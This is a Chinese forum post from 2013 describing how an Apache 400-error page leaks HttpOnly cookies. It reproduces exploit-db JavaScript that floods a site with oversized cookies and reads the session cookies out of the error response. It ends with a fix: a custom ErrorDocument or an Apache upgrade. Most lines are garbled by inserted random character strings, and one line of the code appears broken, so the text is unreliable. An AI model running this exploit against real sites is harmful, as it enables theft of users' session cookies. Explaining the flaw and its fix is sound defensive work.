很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。' ?4 A1 b5 \" B1 b5 P; a
. I; e) o3 p- w: D: y5 U7 D用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
' R0 z4 m% M4 N
7 p/ M+ k$ _9 D* {6 j9 @6 i9 G
4 J* m+ b2 C5 J// http://www.exploit-db.com/exploits/18442/: F# A* Z$ r# [- j; {
function setCookies (good) {
! c9 q7 M* `) e5 G' X% |( h// Construct string for cookie value
! ~; i* w; _6 @var str = "";
+ O5 d) p- d* \3 y* ^. K4 O: o, _for (var i=0; i< 819; i++) {6 S8 P: W( s# ]* Z5 N7 @# W
str += "x";
) K& G$ k; n; r# N/ @6 u' B1 \}, i1 a7 b% I' n0 P1 z6 @5 B7 E) C
// Set cookies3 I! i, e& M8 P/ D6 E
for (i = 0; i < 10; i++) {
* b/ c9 E8 j6 l2 n- F: n! r4 _// Expire evil cookie
6 W7 W b8 [' \! x, b3 ^" {if (good) {
; Z: V L- D9 W/ n5 lvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
. j: s: R n( ]. E0 W- \}
" t' _( n% E! g6 e8 T9 t/ {/ c// Set evil cookie
5 g' {+ ?- O8 j/ nelse {. o4 Z6 V; |+ i: _+ W. p1 u2 T1 i- F: i
var cookie = "xss"+i+"="+str+";path=/";
0 W# q$ y! [1 f& J% F0 N6 L}
% o8 [) o* \5 `+ K6 Kdocument.cookie = cookie;# ?4 t- ]+ h& _. z4 P4 x
}# \. z9 i% F* d& j$ P$ @
}
* L% G5 T1 Z# k3 S2 \! L( f9 jfunction makeRequest() {% X, ?* x( x. K$ P( y8 X
setCookies();
& G: u, _# X! w% \! Ufunction parseCookies () {
* V! B. l+ m$ Z. O* ~. \" Lvar cookie_dict = {};
8 y, y n' c( v3 H }3 T- X' q% d// Only react on 400 status" H. S* B7 h5 D% ]
if (xhr.readyState === 4 && xhr.status === 400) {8 w0 V/ |0 d/ E' I* U1 t0 d
// Replace newlines and match <pre> content
; C$ R9 N4 y' f0 h3 X( Evar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);# W9 q- g& T7 y9 j. Z* ?
if (content.length) {
* K' p5 H9 b3 v// Remove Cookie: prefix
5 d& X. }1 _1 y+ L" o1 icontent = content[1].replace("Cookie: ", "");" B& `+ N u3 l9 {8 h& q5 N, t* ]( X
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);/ A. C2 ?' s. X% s$ \, ~, x2 Z
// Add cookies to object
8 M5 `- P B+ |7 F* I5 ?! Z9 h& }' Kfor (var i=0; i<cookies.length; i++) {
- s; i3 ^0 ^* H. uvar s_c = cookies.split('=',2);3 L1 H, `1 O8 o. G. d3 w# Z" k! J% @
cookie_dict[s_c[0]] = s_c[1];. ~- o4 ]' t0 {9 K5 k! z
}) s+ ^+ V d: N8 B1 G
}
0 G' R- c& c- X% A% { t$ S// Unset malicious cookies
; z8 r; h- H, m& ~ OsetCookies(true);
2 w- c% W# l( jalert(JSON.stringify(cookie_dict));
# g' K' x6 x8 H+ U}: N) R% I' M' H) q. w }
}
7 ^: z% `4 D" L* u// Make XHR request
3 C' v- n+ @0 D6 O; U8 w/ bvar xhr = new XMLHttpRequest();& c% w* _& _$ L0 f
xhr.onreadystatechange = parseCookies;
6 l* B* l+ e$ m9 xxhr.open("GET", "/", true);4 N$ u$ h$ X0 Q* E
xhr.send(null);
% q. |% b, S5 X& Z8 n}
. Y- _* h/ h2 J! ^ zmakeRequest();' h# q, r" y' s4 {' c
/ i5 M: x& J/ q" h# b) B
你就能看见华丽丽的400错误包含着cookie信息。
* [" }3 ?7 \) G% W
' w) d1 O, Y$ C5 ^+ E. \' h4 p下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
: I3 s6 o& {/ l# k6 [# M/ k5 C4 m# @
修复方案:- T$ V6 H: G( {5 Q& Q0 v2 e# B- l
: J# K7 a; o: Q6 K3 R: K# S2 |Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下. Z! E' H8 `+ x, w% M
/ H* }# Z# Y, I' gIn the event of a problem or error, Apachecan be configured to do one of four things,
+ [/ }4 h( y/ L& ^: D
) T. `9 c/ C8 \. B1 V: E3 G: U4 {" J1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
/ `1 x8 V3 a+ y2. output acustomized message输出一段信息) b0 z, S4 q9 B" g9 I+ d" W7 O
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 / a; D8 J; N7 x" z' T+ b
4. redirect to an external URL to handle theproblem/error转向一个外部URL* v) Z/ O9 e( C9 K
9 j9 J- T9 R7 h0 j& A# _经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
, Y7 m2 t0 ]3 I5 E8 ^, R# ]0 H6 z5 A0 w/ N# T+ a; A
Apache配置:1 X5 A( V* ]" Q
- }+ Q7 f! d2 H, h) gErrorDocument400 " security test"
1 ]* N1 O, g* {% T
& B% K6 E; q9 H9 }2 r' t& j7 C当然,升级apache到最新也可:)。7 y w- g* w# H2 ]; n
5 S4 g4 X7 B4 @- ]- z! C
参考:http://httpd.apache.org/security/vulnerabilities_22.html, Q- V4 {! o: @$ C5 n# o
( s! p: v9 F! _ |
发表于 2013-4-19 19:15:43
收藏
支持
反对